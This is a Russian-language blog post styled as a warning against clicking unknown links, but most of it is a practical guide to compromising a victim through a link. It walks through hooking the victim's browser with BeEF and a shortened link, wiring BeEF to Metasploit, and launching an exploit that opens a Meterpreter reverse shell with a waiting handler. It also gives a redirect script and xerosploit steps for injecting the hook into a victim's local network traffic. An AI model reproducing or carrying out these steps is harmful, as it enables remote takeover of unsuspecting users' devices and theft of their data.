March 19, 2020

Взлом ОС через ссылку.

KRAKENteam (взято с канала Krebs World Wide)

Введение.

Каждый раз когда вы переходите по ссылке от неизвестного вам человека, задумывались ли вы о всей опасности того что вы сделали?

Переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены. Сегодня мы на примерах убедимся во всей опасности...

  • Первое что может случится при переходе по ссылке это то, что злоумышленник получит доступ к вашим аккаунтам социальных сетей.
  • Могут узнать ваш IP. И если вы думаете что это не страшно, то вы глубоко ошибаетесь.
  • Подгрузить малварь используя exploit pack.

На мой взгляд, это самое серьезное что может произойти. Ну что, меньше теории больше практики!

Подгружаем малварь.

Exploit pack - это своеобразная связка эксплойтов.

К преибольшому сожалению я не буду показывать в этой теме использование exploit pack'а. По той простой причине, что огонь это не игрушка. Но мы все равно завладеем всем устройством пользователя когда он перейдет по ссылке. А поможет нам сегодня beef в связке с metasploit.

Beef - это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.

Metasploit - фреймворк для поиска и эксплуатации уязвимостей. То есть для проведения тестирования на проникновение.

Запуск beef.

В терминале пишем:

beef-xss

Переходим по ссылке: http://127.0.0.1:3000/ui/authentication

Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.

Нам нужно чтобы "жертва" выполнила у себя скрипт hook.js

Нужно подгрузить его ей.

http://<ваш ip>:3000/demos/basic.html

Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.

Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:

  1. Открываем файл config.yaml у beef. Часто он находится в этой дериктории - /usr/share/beef-xss/
  2. Ищем там раздел extension. У metasploit меняем значение параметра на true
  1. Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.
  2. Запускаем metasploit и пишем следующее
msf> load msgrpc

И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.

Переходим в /usr/share/beef-xss/ и пишем

./beef -x

После этого в beef загрузятся exploit'ы.

Теперь нам доступны exploit'ы которые мы тоже подгрузить пользователю и выполнить их. Для начала я хотел бы узнать какая ОС у моего пользователя.

И как видно на скриншоте - это windows.

Теперь переходим во вкладку Commands и ищем - msf_ms05_054_onload

Выберем payload. Так как у моей "жертвы" windows я выбрал - windows/meterpreter/reverse_tcp

Заполняем все поля.

Теперь открываем msf и пишем:

  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set LHOST <your_ip>
  4. exploit

Во второй команде пишете название пайлоада который выбрали в beef. Вот и все)

А пользователь всего-то перешел по ссылке.

А что если пользователь придерживается правил "я по незнакомым ссылкам не хожу"? На этот случай у нас имеется еще один ответ. Создаем файл hack.js с таким содержимым:

<script>
  document.location.href="http://<your ip>:3000/demos/basic.html";
</script>

Запускаем xerosploit. И выбираем:

scan --> ip жертвы --> injectjs --> run --> путь до hack.js

Далее проделываем выше описанное. Вот так мы взломали не о чем не подозревающего пользователя. Будьте осторожны, друзья.

Вывод

Не стоит переходить по ссылкам от незнакомцев, это может нанести критический вред вашему устройству. А представьте себе если залить hook.js на уязвимый к xss веб-ресурс? Последствия просто ужасны.